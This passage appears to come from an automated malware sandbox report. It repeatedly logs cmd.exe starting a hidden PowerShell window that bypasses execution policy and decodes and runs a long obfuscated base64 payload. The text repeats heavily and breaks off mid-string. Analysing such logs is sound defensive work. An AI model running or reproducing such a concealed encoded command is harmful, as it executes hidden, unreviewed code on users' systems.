q2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy